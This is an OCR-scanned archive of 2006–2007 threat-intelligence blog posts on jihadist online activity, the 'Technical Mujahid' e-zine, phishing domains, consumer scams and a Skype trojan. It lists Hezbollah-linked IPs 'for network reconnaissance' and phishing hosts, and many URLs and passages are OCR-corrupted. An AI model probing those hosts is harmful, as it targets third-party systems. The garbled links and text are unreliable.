Here’s a little [9]something for everyone thinking [10]cyberterrorism is surreal. Consid- 
ering for a while that even primitive forms of existence such as [11]street gangs utilize 
the [12]Internet for propaganda, wouldn’t a much better financed terrorist organization 
be compelled to participate? In fact they’ve been doing so [13]even before 9/11, but | feel 
it’s the good guys’ cavalier attitude that ended up in the now, mature cyberterrorism platform. 


A great source for [14]open source intelligence to anyone interested in, here’s a sum- 
mary : 


"This sixth and newest version of the Simon Wiesenthal Center’s annual report of prob- 
lematic websites exposes the growing use of the Internet as a key propaganda weapon, 
marketing tool and fundraising engine by terrorist groups such as Al Qaeda and Hamas, in 
addition to its continuing assessment of traditional extremist groups such as the KKK and 
neo-Nazis. "Although they swear to destroy the West, extremists and terrorists have taken 
to using Western technology to recruit, finance and plan their insidious actions," said Mark 
Weitzman, Director of the Simon Wiesenthal Center’s Task Force Against Hate." 


Now what would an intelligence agency do when knowing exactly where to look? Shut 
them down and prosecute someone, or adapt deep within the community to [15]gather as 
much OSINT as possible. Whatever the outcome, keep in mind on the possibility of indirect 
intelligence engineering, as the way you’re watching them, the same way they’re watching 
you, watching them. 


1. http: //ddanchev. blogspot .com/2006/06/tracking-down-internet-terrorist.htm 


2. http: //ddanchev. blogspot .com/2006/05/arabic-extremist-group-forum-messages .htm 


3. http: //ddanchev. blogspot .com/2006/08/cyber-terrorism-communications-and_22.htm 


4. http: //ddanchev. blogspot .com/2006/08/steganography-and-cyber-terrorism.htm 
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5 
6 

7 

8. 

9. http: //www.toolsfortolerance.com/site/c.pwKOJ8NSJrF/b. 1486519/k.DC80/Digital_Terrorism_and_Hate_2006.htm 
10. 

1. 

12. 


13. http://www. haganah.org.il/harchives/005680.htm 
14. http://ddanchev. blogspot .com/2006/09/cyber-intelligence-cyberint.htm 


15. http://www.washingtontimes.com/commentary/20061007-104915-3656r .htm 


2.12.10 Full List of Hezbollah’s Internet Sites (2006-12-11 00:56) 


Some of [1]the propaganda is so catchy it can easily compete with the [2]Soviet propaganda 
posters during the Cold War visualizing the evil forces from their point of view. Great case 
studies on [3]Internet psychological operations, and Hezbollah’s understanding of [4]Cybert- 
errorism. 


Here’s a list of the URLs mentioned : 
moqawama.org 
moqawama.tv 
ghaliboun.net 
hizbollah.org 
nasrollah.org 
hizbollah.tv 
moqawama. info 
moqawama.net 
moqawama.org 
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moqgavemat.com 

moqavemat.ir 

shiaweb.org 

manartv.com.|b 

almanar.com.I|b 

islamicdigest.net 

manartv.com.I|b 

al-nour.net 

intiqadonline.com 

alintiqad.com 

alahed.org 

wa3ad.org 

islamicdigest.net 

somod.org 

bintjbeil.com 

altaybeh.net 
deirqanounalnahr.jeeran.com 
alshahid.org 

almahdiscouts.org 

jihadbinaa.org 

samirkuntar.org 
groups.msn.com/justiciadivinavenezuela 
es.groups.yahoo.com/group/Hezboallah _latino 
groups.msn.com/autonomiaislamicawayuu 
groups.msn.com/Hezbollahelsalvador 
hezboallahpartidoislamico.blogspot.es 


And the IPs for your network reconnaissance pleasure : 


82.137.205.249 
82.137.205.247 
202.75.42.155 
205.178.189.131 
216.21.229.196 
202.71.104.241 
209.85.5.112 
203.121.71.217 
82.137.205.249 
82.137.205.249 
69.10.136.210 
207.44.244.117 
66.98.225.220 
209.172.35.181 
209.85.5.113 
208.64.28.10 
66.199.236.147 


Related posts: 
[5]Analysis of the Technical Mujahid Magazine - Issue One 
[6]Hezbollah’s DNS Service Providers from 1998 to 2006 
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[7]Hezbollah’s use of Unmanned Aerial Vehicles - UAVs 


ttp://www.terrorism-info.org.il/malam_multimedia/Hebrew/heb_n/html/hezbollah_int.ht 
_nvtp://Adanchey blogspot. con/2006/09/soviet=propaganda-posters-during-cold. hte 
See EES TTT 

_hvtp://de1 cio. us/DDanchey /Gyberterrorisn 


ttp://ddanchev.blogspot.com/2006/12/analysis-of-technical-mujahid-issue-one.htm 


. http: //ddanchev. blogspot .com/2006/09/hezbollahs-dns-service-providers-from. htm 
. http://ddanchev. blogspot . com/2006/09/hezbollahs-use-of-unmanned-aerial .htm 


2.12.11 Analysis of the Technical Mujahid - Issue One (2006-12-11 01:36) 
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An [LJOSINT conducted, a tax payer’s buck saved somewhere. 


Last week, the [2]mainstream [3]media was [4]abuzz with the release of the first jihadist e-zine 
discussing hacking, information hiding, of course in between the lines of radical propaganda, 
whereas no one was providing more information on the exact nature of the articles, but the 
[5]SITE institute. So | decided to take a peek at the [6]Technical Mujahid for myself, in or- 
der to break through the FUD, or not see the "threat sliced on pieces" by different news sources. 


According to the official release, [7]the magazine’s download locations seem to be slowly 
becoming useless, besides the Rapidshare link which seems to be still [8]fully working - the 
Internet Haganah reasonably points out that owning a copy of it might get you in trouble in 
some countries, so don’t. 
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Despite that | don’t speak any Arabic languages, and | pressume neither do you, the e-zine 
is rich on visual materials and you can pretty much grasp the big picture. Namely, that it’s 
practical compared to theoretical source of information, it’s targeting mixed audiences, and 
it’s keeping it very simple. So I’ve decided to compile a summary of the key sections and 
topics in the articles covered for future references. In one sentence - its simplicity is not to be 
feared, but its practicality. 


See! a phe So Sg Lead) ABN er Lait Ste 2) pose swt Malad Dad 8 prs Ups Soy CLL gh Jeg 
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The release of the magazine is an indication of the ongoing use of the Internet for mass- 
education - economies of scale - through videos and visual howto’s, but much more advanced 
information related to information security could be obtained from public sources. The cell- 
phone triangulation in Iraq, and the demonstration of Hacker Defender are worth mentioning, 
but overall, concepts such as information warfare or online PSYOPS remain unstructured and 
abstract ideas to the average jihadist - for now. Notice the multimedia file used as an example 
for the alternate data stream as well and draw up the conclusions on your own. 


Don’t exclude the logical possibility of on purposely disinforming the general public and various 
intel folks across the world on a relatively primitive inforwar practices such as using PGP and 
alternate data streams. 


Here are the articles themselves : 
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C:\. faire \hxdefi@@rodcd ‘\ 


C:\>net stop HackerDofender13B 
The service is not responding to the control function. 


More help is available by typing NEI HELPMSG 2186. 


C:\ded fajr 


C:\. fajr ded hxdef1e@Or 


C:\ fajyr \ixdef 1 Afr > hxdef1 AG .exe s-uninstall 


CS 35 Jl Ale sad LS dage Clb> 
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01. Article One - Alternate Data Streams - steganography example given, rootkits - hacker 
defender covered, examples provided, abomosab.jpg used as an example 


02. Article Two - Satellite Communications and the importance of GPS, handheld GPS, explains 
triangulation, mentions satellite imagery’s power, and satellite transfer speeds, mentions 1575 
and 1227 as carrier frequencies and Digital Sequence Spread Specturm - DSSS, mentions hand- 
held GPS receiver, includes photos of 3G data card, laptop. It then discusses a locked device 
with a "WARNING" sign on it 


03. Article Three - Visual HOWTO on Install VMware 


04. Article Four - Article on digital media players, the different formats, subtitles, and the NTSC 
and PAL systems, recording basics as it looks like 


05. Article Five - Introduction to PGP - Zimmerman is quoted, explanation of the RSA algorithm, 
recommending the use of PGP Whole Disk, features warning message that trial versions of PGP 
Whole Disk will self-decrypt 


And [9]SITE Institute’s comments on the propaganda side in the introduction and conclusion : 


"For future issues, the editors urge members of the jihadist Internet community to submit arti- 
cles in the field of technology for publishing. They write: “My kind, technical Mujahid brother, 
the magnitude of responsibility which is placed upon you is equal to what you know in the re- 
gard of information. Do not underestimate anything that you know; perhaps a small article that 
you write and publish can benefit one Mujahid in the Cause of Allah or can protect a brother of 
yours in Allah. This way you will gain the great reward with the permission of Allah." 


If you perceive the Technical Mujahid magazine as a threat to the national security of any 
country, old issues of [10]Phrack magazine must be giving you the nightmares. 


Have a productive week everyone, and [11]stay informed! 
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1. http: //ddanchev. blogspot .com/2006/09/benefits-of-open-source-intelligence.htm 


2. http: //www.pcadvisor.co.uk/news/index.cfm?newsid=7764 


3. http: //www.pcworld.com/article/id, 128072-c, currentevents/article.htm 


6. http: //teqanymag.arabform.com/ 
7. http://internet-haganah.org/hmedia/teaqny_magi_announce/index.htm 


9. http://siteinstitute.org/bin/articles.cgi?ID=publications229606&Category=publications&Subcategory= 


10. http://www.phrack.org/ 
11. http://del.icio.us/DDanche 


2.12.12 Analysis of the Technical Mujahid - Issue One (2006-12-11 16:57) 


[1] * An [2]OSINT conducted, a tax payer’s buck saved somewhere. 


Last week, the [3]mainstream [4]media was [5]abuzz 

with the release of the first jihadist e-zine discussing hacking, 

information hiding, of course in between the lines of radical 

propaganda, whereas no one was providing more information on the exact 

nature of the articles, but the [6]SITE institute. So | decided to take a peek at the [7]Technical 
Mujahid for myself, in order to break through the FUD, or not see the "threat sliced on pieces" 
by different news sources. 


According to the official release, [8]the magazine’s download locations seem to be slowly 
becoming useless, besides the Rapidshare link which seems to be still [9]fully working - the 
Internet Haganah reasonably points out that owning a copy of it might get you in trouble in 
some countries, so don’t. 


Despite 

that | don’t speak any Arabic languages, and | pressume neither do you, 
the e-zine is rich on visual materials and you can pretty much grasp 
the big picture. Namely, that it’s practical compared to theoretical 
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source of information, it’s targeting mixed audiences, and it’s keeping 

it very simple. So I’ve decided to compile a summary of the key sections 
and topics in the articles covered for future references. In one 

sentence - its simplicity is not to be feared, but its practicality. 


x 


The 

release of the magazine is an indication of the ongoing use of the 

Internet for mass-education - economies of scale - through videos and 

visual howto’s, but much more advanced information related to 

information security could be obtained from public sources. The cellphone triangulation in 
Iraq, and the demonstration of Hacker Defender are worth mentioning, but overall, concepts 
such as information warfare or online PSYOPS remain unstructured and abstract ideas to the 
average jihadist 

- for now. Notice the multimedia file used as an example for the 

alternate data stream as well and draw up the conclusions on your own. 


Don’t 

exclude the logical possibility of on purposely disinforming the 
general public and various intel folks across the world on a relatively 
primitive inforwar practices such as using PGP and alternate data 
streams. 


Here are the articles themselves : 


x 


01. Article One - Alternate Data Streams - steganography example given, rootkits - hacker 
defender covered, examples provided, abomosab.jpg used as an example 
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02. Article Two - Satellite Communications and the importance of GPS, handheld GPS, 
explains triangulation, mentions satellite imagery’s power, and 

satellite transfer speeds, mentions 1575 and 1227 as carrier frequencies 

and Digital Sequence Spread Specturm - DSSS, mentions handheld GPS 

receiver, includes photos of 3G data card, laptop. It then discusses a 

locked device with a "WARNING" sign on it 


03. Article Three - Visual HOWTO on Install VMware 


04. Article Four - Article on digital media players, the different formats, subtitles, and the NTSC 
and PAL systems, recording basics as it looks like 


05. Article Five - Introduction to PGP 

- Zimmerman is quoted, explanation of the RSA algorithm, recommending 
the use of PGP Whole Disk, features warning message that trial versions 
of PGP Whole Disk will self-decrypt 


And [10]SITE Institute’s comments on the propaganda side in the introduction and conclusion 


"For 
future issues, the editors urge members of the jihadist Internet 
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community to submit articles in the field of technology for publishing. 
They write: “My kind, technical Mujahid brother, the magnitude of 
responsibility which is placed upon you is equal to what you know in the 
regard of information. Do not underestimate anything that you know; 
perhaps a small article that you write and publish can benefit one 
Mujahid in the Cause of Allah or can protect a brother of yours in 

Allah. This way you will gain the great reward with the permission of 
Allah." 


If you perceive the Technical Mujahid magazine as a threat to the national security of any 
country, old issues of [11]Phrack magazine must be giving you the nightmares. 


Have a productive week everyone, and [12]stay informed! 


1. https://web.archive.org/web/20101016192214/http://1.bp.blogspot.com/_wICHhTiQmrA/RXyeMNwujHI/AAAAAAAAAGQ/b 
YrgHm8_PQ/s1600-h/stega_hiding. jpg 
2. http: //ddanchev. blogspot . com/2006/09/benefits-of-open-source-intelligence.htm 


7. http://teqanymag.arabform.com/ 
8. http: //internet-haganah.org/hmedia/teaqny_magi_announce/index.htm 


10. http://siteinstitute.org/bin/articles.cgi?ID=publications229606&Category=publications&Subcategory= 


11. http://www. phrack. org/ 
12. http://del.icio.us/DDanche 


685 


2.12.13 Google Translate Hack (2006-12-12 12:35) 


Translate Text 


Original text: Automatically translated text: 
Eugene Kaspersky AHTMBMpycHaa 


[English to Russian BETA >| Translate | 


Google seems to have [1]fixed this one already, but trying it the other way around you can still 
feel what BETA is all about. My guess is that translations of unknown words or combinations 
better return a clustered result from the Web, than no result at all, which is exactly what is 
happening in this case. 


1. http: //www.viruslist .com/en/weblog?weblogid=20818729 


2.12.14 BuzZzZ Generation (2006-12-12 12:48) 
Just a few of the sites/blogs that have recently featured my posts exposing the low lifes : 


- Linuxsecurity.com - "[1]Analysis of the Technical Mujahid - Issue One" ; "[2]Current State of 
Internet Jihad" 

- Informit.com - "[3]How do terrorists spell rootkit in Farsi?" 

- Defensetech.org - "[4]Rapid fire 1"; "[5]Rapid fire 2" 

- Net-security.org - "[6]Analysis of the Technical Mujahid - Issue One" 

- [7]Cyberia.org.il 


Interested in Knowing how was AI Qaeda using the Internet before 9/11 with all the mul- 
timedia released back then? Moreover, have you ever wanted to take a peek at some of the 
[8]most recent tools-of-the-trade [9]malware authors use on a daily basis? Stay tuned for the 
Christmas Full Disclosure Series summarizing some of my recent findings, and beyond! 


[10]Share your knowledge. It’s a way to achieve immortality. Dalai Lama 


————————— 
ttp://www.linuxsecurity.com/content/view/126180/169/ 


ttp://www.informit.com/discussion/index.asp?postid=267d22bb-b27e- 4c2b-b3cf-018e8e2df18d&f 1=rsskr1=1 


PR ce TCT 
5, http: //aiv. defensetech.org/archives/002062. html 
6, http: //net-security .org/news.php?id-12088 
7. 
8. 
9. 


10. 
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2.12.15 Busy Wednesday (2006-12-14 04:12) 


1,258 


912 


Wednesday 
Wednesday, Wednesday, so [1]good to blog. 


1. http://ddanchev. blogspot .com/2006/10/return-on-investment-of-blogging. htm 


2.12.16 Terrorism Cartoon Contest (2006-12-14 04:21) 


Why is it that even with my extemely well developed sense of black humour, I’m still [1]not 
laughting? Here’s another contest collection, again hosted by Iran, this time on [2]the denial of 
the Holocaust. Thankfully, my history teacher taught me otherwise, and the No Such Agency 
folks have the complete coverage in their indispensable "[3]Eavesdropping on Hell : Historical 
Guide to Western Communications Intelligence and the Holocaust 1939-1945". 
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1. http: //www.irancartoon.com/100/contest/terrorism/ 
2. http://www. irancartoon.ir/gallery/album48?page=1 
3. http: //www.nsa.gov/publications/pub1i00043 . pdf 


2.12.17 Top Ten Scams of 2006 (2006-12-14 04:37) 


ConsumerAffairs.com did a great job in summarizing the [1]top 10 scams of 2006 "from the 
roughly 50,000 consumer complaints we’ve processed in the past year". Here’s what the 
gullible consumer complains about : 


01. [2]Fake Lottery Scam 


ConsumerAffairs.com reported on one case in which an [3]lelderly Kansas manlost over 
$300,000. [4]You should have Asked Merrill to point you to the "tickets" with the highest 
probability of success, but it’s too late for you now. Baby booming gullibility in action. 


02. [5]Phishing-Vishing Scams 


I’m very surprised it’s the second and not the first complain, but how come? Consumers aren’t 
even aware they got scammed at the first place. Do [6]yourself a favour, and don’t discuss 
your financial details with automated systems. Think before you act, it’s like deciding whether 
to enter a singles bar or not. 


03. [7]Phony Job Scam 


"Any employment offered online without a formal interview, no matter where it origi- 
nates, should be treated with skepticism," said Arkansas Attorney General Mike Beebe, who 
investigated one of these scams in 2006. Thank you, you've just ruined the entire virtual 
telecommuting concept. I’m aware of another type of scam where fake job postings seek to 
harvest as much personal information from applications as possible. [8]Other practices are 
also used. 
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04. [9]Negative Option Scams 
Look for the ASTERISKS, it should be somewhere around the FREE proposal. 
05. [10]Nigerian 419 Scams 


People falling into this one, are the type of people suffering from the "[11]rich-uncle 
complex". You don’t know his exact wealth, but you secretly hope that on a sunny day a 
handsome, and of course charging by the minute laywer will bring the news you’ve been 
subconsciously expecting your entire life. Think for real and forget about the Internet. Would 
a complete stranger offer you millions of dollars because he has no one else to give the money 
to, or cannot open up a bank account for themselves? 


06. [12]Pump & Dump Scam 
Rainer BOhme and Thorsten Holz evaluated [13]the situation. 


07. [14]Bogus Fuel Saving Devices 

Make an analogy with washing powder/tablets/liquid who’s actively advertised as an "energy 
saver" due to its sophisticated technology that doesn’t require hot water, when it happens to 
be a commodity and if you’re going to be saving energy from it, then you've either watched a 
movie about the Third World, or are very desperate. 


08. [15]Grandparents Scam 

An elderly person is targeted by the scammer who calls and says something like, "It’s me, 
grandpa." The elderly person will respond, thinking it’s one of their grandchildren. Unbelieav- 
able, and perhaps another reason to keep in touch with your grand-parents more often, so 
they could at least recognize your voice. 


09. [16]Oprah Ticket Scam 


In case you fall victim into this one, you’re not just bored to the bottom of your brain, 
but a potential guest at Oprah’s show with the unique ability to explain how this scam ruined 
your life, but later on helped your meet the person of your life, where else if not in an online 
scam discussion group. | feel you. 


10. [17]craigslist Scam 


It’s like the Yellow Pages, some postings are so automatically generated that they hap- 
pen to be a waste of time, but hopefully not money, so be aware. 


. http://www. consumeraffairs.com/news04/2006/12/top_ten_scams .html 

. http: //wuw.consumeraffairs. com/news04/2006/08/atlantic_lottery html 

. http://www. consumeraffairs . com/news04/2006/10/lottery_scam_victim.html 
. bttp://askmerrill.ml.com/fa_front/1,2280, ,00.htm1l?pg=cnp 

. http://www. consumeraffairs. com/news04/2006/01/cpb_phishing . html 

. http: //phishtanksitechecker . com/ 

. http://www. consumeraffairs.. com/news04/2006/05/career_building_scam.html 


ONaAURWN PR 


ttp://www.google.com/search?hl=en&q=/22phone+***/,22+/,22+address+*/,22+/,22e-mail/,22+intitle/,3A,22curricul 


n+vitae/,22&btnG=Google+Searc 
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10, http://www, consuneraffairs.con/news04/2006/07 /nigeria_ 419. na 
| hetp://en. wikipedia. org/iki/Scrooge, MeDucl 
| http: //mvy. consuneraffairs .con/news04/2006/10/panp_danp. hal 
_http://ssrn. con/abstract-897481 
| http://www. consuneratfairs .con/nevs04/2006/11/ grandparents scan, bial 


http: //www.consumeraffairs.com/news04/2006/11/oprah_scam.htm 


9. http://www. consumeraf fairs .com/news04/2005/negative_option.htm 
http: //www.consumeraffairs.com/news04/2006/08/craigslist_scam.htm 


2.12.18 Le Cyber Jihad (2006-12-18 08:20) 


It’s very nice to see that Marc Olanié is still keeping track of my [1]articles. Here are [2]several 
more [3]worth [4]Babelfishing. 


1. http: //www.reseaux-telecoms.net/actualites/lire-le-cyber- jihad-fait-trembler-1-amerique-15053.htm 

2. http://www.reseaux-telecoms.net/actualites/lire-bientot-le-virus-et-1-attaque-dos--on-demand-12182.htm1?p 
id=1 

3. : . reseaux- telecoms .net/actualites/lire-danchev-sur-1-achat-de-failles-12703.html?pid= 


4. http://www.reseaux-telecoms.net/actualites/lire-des-truands-des-failles-du-business- 13219. html 


2.12.19 Google and Yahoo’s Shareholders Against Censorship (2006-12-19 04:46) 


C IP 


[1]Collective bargaining tends to achieve the necessary echo effect : 


"The New York City Pension Fund wants shareholders to force Google and Yahoo to refuse 
Internet censorship requests by governments. The fund, which owns nearly $280 million worth 
of Google shares and $110 million in Yahoo shares, filed resolutions for shareholders at the 
two Internet companies to vote on at the next shareholder meetings. The resolution states 
that U.S.-based technology companies "that operate in countries controlled by authoritarian 
governments have an obligation to comply with the principles of the United Nations Declaration 
of Human Rights." 


Go, go, go, shareholders. So that by the time [2]censorship ends up where it’s [3]most aggres- 
sive for the [4]time being, we can feel proud of ourselves living in a World 2.0, a world in which 
we all have universal access to the collective wisdom of everyone. Wait, that [5]used to be 
part of both, Google’s and Yahoo’s mission statements [6]once. From another perspective, the 
companies themselves have their hands tied by the overal Western world’s revenues genera- 
tion greed, and outsourcing inspirations in China’s booming economy. But pretending it isn’t 
happening is like ignoring the existence of the [7]thought police these days. 
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1 
2 

3: 

4 
5. ; : i 

6. 

7. 


ttp://ddanchev.blogspot.com/2006/01/twisted-reality.htm 


ttp://irrepressible.info/static/pdf/FOE-in-china-2006-lores.pdf 


ttp://en.wikipedia. org/wiki/Thoughtcrime 


2.12.20 Phishing Domains Hosting Multiple Phishing Sites (2006-12-19 08:21) 
Your Details 


Please confirm your membership 
details below 


Personal banking o 
>» Premier banking 0 
Business banking oO 


Surname 

Membership number 2010 [OO 
Five-digit passcode fo 
Memorable word 


© yes 
Do you use telephone banking? c 
no 


Select the green ‘next’ button to continue. 


Well, well, well. What do we got here? Couple of interesting domains hosting phishing sites of 
multiple banks for you to take a look at, or at the cached versions to be precise. What’s worth 
mentioning is the rise of phishing sites using the much more easily and anonymously regis- 
tered .biz ; .info ; .name domains. However, the first part of these is related to 211.137.13.131: 


[1]baldwindy.name 

[2 ]leqwas.biz 

[3]noosfo.biz 

[4]rsytarai.biz, [5]Janother one 


Multiple hosting: 
[6]201.195.156.13 
[7 ]lugers.biz 
[8]loreta. biz 
[9]tuker.info 
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Now, try searching the entire .biz space for "[10]Bank Austria Creditanstalt". The good 
news is that even the average [11 ]anti-phishing toolbar is capable of detecting these. The bad 
news is that customers aren’t currently using [12]such toolbars as much as they should. And 
with phishing toolkits lowering the entry barriers in this space by making it easy for wannabe 
phishers to "make an impact", we’ve got an efficient problem to deal with. 


1. http://209.85.135.104/search?q=cache : QSNfyXE88_8J:www.53.com.bankingportal. id840852369. baldwindy .name/sbcb 


confirm/&hl=en&ct=clnk&cd= 


2. http://209.85.135.104/search?q=cache: 7vz3eF101v0J : www.53.com.portal.leqwas.biz/startproc.id/+%22211.137+1 


131%22&h1=en&ct=clnk&cd=4 


3. http://209.85.135.104/search?q=cache: tdtf£TCgC7fgJ :national.com.au.personal_finance.id99999999999999 .noosfo 


.biz/id71077/+7/22Internet+Banking+Conf irmationtProced 


4. http://209.85.135.104/search?q=cache: r6uVZeRkPsAJ : bankofscotlandhalifax.co.uk.id99999999999999 .noosfo.biz/ 


1d0777351/+%22211 .137+13.131/22&h1=en&ct=clnkk&cd= 


5. http: //209.85.135.104/search?q=cache : -F5f£fLVf3McsJ:meine.deutsche-bank.de.webobjects.rsytarai.biz/dbpbc.woa 


4+722211.1374+13.131%22&h1=en&ct=clnk&cd=9 


ttp://www.google.com/search?q=site:201.195.156.130&hl=enklr=kf ilter=0 


. http://www. google. com/search?q=site: lugers.biz&hl=enklr=kfilter= 
ttp://www.google.com/search?q=site: loreta.bizkhl=enklr=kfilter=0 
ttp://www.google.com/search?q=site: tuker. infokhl=enklr=kfilter=0 

. http://www. google. com/search?hl=enklr=k%q=site/3Abiztintitle/3A,22Bank+Austriat+Creditanstalt/22 


. http: //ddanchev. blogspot . com/2006/03/anti-phishing-toolbars-can-you-trust .htm 
12. http://www.cylab.cmu.edu/default.aspx?id=225 
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2007 


3.1 January 


3.1.1 Were you Tracking Santa’s Location? (2007-01-04 14:39) 


As uSual, [1]JNORAD were, but there’s one minor issue to keep in mind and that’s how during 
the Christmas and New Year holidays Santa Claus is the most successfully targeted victim of 
identity theft. Hopefully they were [2]tracking the real Santa through the real Rudolph as the 
weakest link : 


"The satellites have infrared sensors, meaning they can detect heat. When a rocket or missile 
is launched, a tremendous amount of heat is produced - enough for the satellites to detect. 
Rudolph’s nose gives off an infrared signature similar to a missile launch. The satel- 
lites can detect Rudolph’s bright red nose with practically no problem. With so many 
years of experience, NORAD has become good at tracking aircraft entering North America, 
detecting worldwide missile launches and tracking the progress of Santa, thanks to Rudolph." 


All rest is a commodity but attitude. 


1. http://www.noradsanta.org/en/default. php 
2. http://www.noradsanta.org/en/how_we_do_it.php 
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3.1.2 Technical Analysis of the Skype Trojan (2007-01-04 15:00) 


During December yet another trojan started making rounds, this time dubbed [1]the Skype tro- 
jan - SEO conspiracy. Was the trojan exploiting a zero day vulnerability in the Skype protocol? 
Absolutely not, as it was basically using Skype’s messaging service as a propagation [2]vector, 
thus, the gullible and in a Christmas mood end user was still supposed to interact with the 
malware by clicking on the link. And with required end user’s interaction, the possibilities for 
major outbreaks were very limited. Perhaps the only development worth mentioning is the 
malware author’s use of commercial anti-cracking software - [3]NTKrnl Secure Suite - to make 
the unpacking harder, or at least theoretically improve the time needed to do so compared to 
using publicly obtainable, and much more easily detectable packers. 


Two days ago, Nicolas Brulez from Websense Security Labs released [4]a technical anal- 
ysis of the trojan itself, and here’s your proof for the logical possiblities of specific copy’n’paste 
malware modules : 


"The main protection scheme | faced was the copy pasted from my Honeynet Scan of 
The month 33 Challenge. The breakpoint detection was 100 % identical, even the numbers 
| had generated randomly. More importantly, the technique | had written based on SEH + 
cpuid/rdtsc was also copied. The only difference was that they used the EDX register to 
compare the timing. 


Copy pasting protection code without even changing it a little, provides no se- 
curity at all and allowed me to unpack it even quicker. (gotta love looking at code you 
wrote 2 years ago) 


It apparently included some other tricks, that made it a little harder to unpack, and the 
file looked like it was corrupted at some point. In order to debug it and comment my dis- 
assembly in a readable way, | opted to use a userland debugger, and thus had to write a 
little shellcode for injection into the packed malware. Basically, it entailed abusing Windows 
Exception Handling (using a hook), to get past every check. After that, one could attach 
his favorite userland debugger to the malware and eventually find the Original Entry Point. 
Although the imports rebuilding for this protector isn’t hard at all, it wasn’t mandatory in this 
executable as it only imported one function: ExitProcess" 
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And while the average malware coder is using commercial tools to make his releases 
harder to analyze, the [5Jalmighty jihadist is still living in the [6]Hacker Defender world. 


ttp://www.websense.com/securitylabs/blog/blog.php?BlogID=101 
http: //ddanchev.blogspot.com/2006/06/skype-as-attack-vector.htm 


ttp://www.ntkrnl.com/products/securesuite/default.php 


1. 
2. 
3. 
4 
5, 
6. 


http: //ddanchev.blogspot.com/2006/12/analysis-of-technical-mujahid-issue-one.htm 


http: //hxdef .org/ 


3.1.3 Foreign Intelligence Services and U.S Technology Espionage (2007-01-07 18:20) 


A2 + MONDAY, SEPTEMBER 28, 1998 » MIAMI DAILY BUSINESS REVIEW 


DaIee 


Hee 5S 


———— 


: KELL 


ms ESS 
ir 3 ; ETB BISCAYNE) 


ELITE CUBAN ESPIONAGE TEAM INVADES MIAMI 


Talking about globalization, like it or not, perceive it as a threat to national security or a key 
economic benefit, it’s happening and you cannot stop it. Nothing else will add more long-term 
value to a business or a military force than innovation, and when it comes to the U.S military’s 
self-efficiency in R &D, it’s pretty evident they’ve managed to achieve the balance and still 
dictate the rhythm. 


[1]The methods used aren’t nothing new : 


"The report says that foreign spies use a wide variety of techniques, ranging from set- 
ting up front companies that make phony business proposals to hacking computers containing 
information on lasers, missiles and other systems. But the most popular methods of attempt- 
ing to obtain information was a simple “informational request” (34.2 %) and attempts to 
purchase the information (32.2 %). Attempts were also made using personal relationships, 
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searching the Internet, making contacts at conferences and seminars, cultural exchanges." 


[2]What’s new is the actual report in question - [3]"Technology Collection Trends in the 
U.S. Defense Industry". OSINT is also an important trends gathering factor, and so is corporate 
espionage through old-fashioned malware [4]Japproaches or [5]direct intrusions, and it’s 
great the report is considering the ease of execution on these and the possible network 
vulnerabilities in the contractors : 


"DSS also anticipates an increase in suspicious internet activity against cleared defense 
contractors. The potential gain from even one successful computer intrusion makes it an 
attractive, relatively lowrisk, option for any country seeking access to sensitive information 
stored on U.S. computer networks. The risk to sensitive information on U.S. computer systems 
will increase as more countries develop capabilities to exploit those systems." 


Then again, what’s produced by the U.S but cannot be obtained from there, will be from 
other much more insecure third-party purchasers - how did [6]Hezbollah got hold of night 
vision gear? Or even worse, by obtaining the [7]leftovers from a battle conflict for further clues. 


The bottom line question - is the illegal transfer of U.S technology threat higher than 
the indirect leakage of U.S educated students taking their IQ back home, while feeling 
offended by their inability to make an impact were they a U.S citizen? 


. http://www. kommersant .com/p-9797/r_527/intelligence_gathering_espionage/ 
. http://www. fas .org/blog/secrecy/2007/01/dss_views_foreign_collection_o.htm 
. http://www. fas.org/irp/threat/2006trends . pdf 


. http: //ddanchev. blogspot .com/2006/07/north-koreas-cyber-warfare-unit-121.htm 


ttp://www.sfgate.com/cgi-bin/article.cgi?file=/c/a/2006/08/20/MNGK9KLVH41 . DT. 


. http: //www.fas.org/blog/secrecy/2006/07/dod_manual_on_technical_intell.htm 


1 
2 
3 
4. http: //ddanchev. blogspot .com/2006/09/biggest-military-hacks-of-all-time.htm 
5 
6 
7 


3.1.4 Four Years of Application Pen Testing Statistics (2007-01-07 20:24) 


Attack Class Hits 


14% 


[1]Invaluable : 
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"The article presents a unique opportunity to take a peek into the usually secluded data regard- 
ing the actual risk posed to Web applications. It shows a constant increase in risk level over the 
four years and an overwhelming overall percentage of applications susceptible to information 
theft (over 57 %), direct financial damage (over 22 %), denial of service (11 %) and execution 
of arbitrary code (over 8 %). The article analyzes results of first time penetration tests as well 
as repeat tests (retests) in order to evaluate the evolution of application security within Web 
applications over time." 


Lots of figures respecting your busy schedule, and the authors’ data pointing out how the lack 
of repeated testing, and the "security as a one time purchase" mentality, actually means a 
false sense of security. Having a secured web application doesn’t mean the end user won't 
be susceptible to a client side attack, and having a secured end user doesn’t mean the web 
application itself will be secured, ironic, isn’t it? Perhaps prioritizing the platforms to be audited, 
namely [2]the major web properties, could protect the always unaware [3]end user to a certain 
extend - from himself. [4]Related [5]comments. 


ttp://www.imperva.com/application_defense_center/papers/how_safe_is_it.htm 
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3.1.5 Web Economy Buzz Words Generator (2007-01-07 20:59) 
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Dana Summers 


The Griandp Sentinel! 
Yritung Media Services 


Whether looking for VC cash, or having a quota to meet being a salesman, [1]some of these 
may come handy or pretty much make someone's morning. 


Here are my favorite: 
697 


e-enable integrated mindshare 
empower impactful infomediaries 
architect compelling ROI 
productize 24/7 e-services 
recontextualize compelling ROI 


Doesn't matter how well you project your success, if you don’t have an elevator pitch 
worth someone’s attention span, than you don’t know what you’re doing, but marely relying 
on the web economy’s state of buzziness - this is another one. Try some [2]copywriting 
exercises too. 


1. http: //www.dack.com/web/bullshit .htm 
2. http: //ddanchev. blogspot .com/2006/07/spreading-psychological- imagination. htm 


3.1.6 Sunday’s Portion of Hahaha (2007-01-07 21:28) 


While patiently waiting for the future adventures of [1]Monica Furious, | came across a nice 
collection of [2]cartoons. I’m sure you'll find these two very entertaining - "[3]The Disabled 
Cookies" and "[4]The Spam Prison". 


1. http: //leadsalad.com/ 
2. http: //www.londonstimes.us/toons/index_computers.htm 


3. http://www. londonstimes.us/toons/cartoons/display .html?image=Simeon_DisabledCookies4. jpg 


4. http://www. londonstimes.us/toons/cartoons/display.html?image=Bennett_prisonguys. jpg 


3.1.7 Visits to the White House Now Top Secret Information (2007-01-07 21:50) 


Informative - White House visitor logs declared top secret 


[1] 
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"The five-page document dated May 17 declares that all entry and exit data on White House 
visitors belongs to the White House as presidential records rather than to the Secret Service 
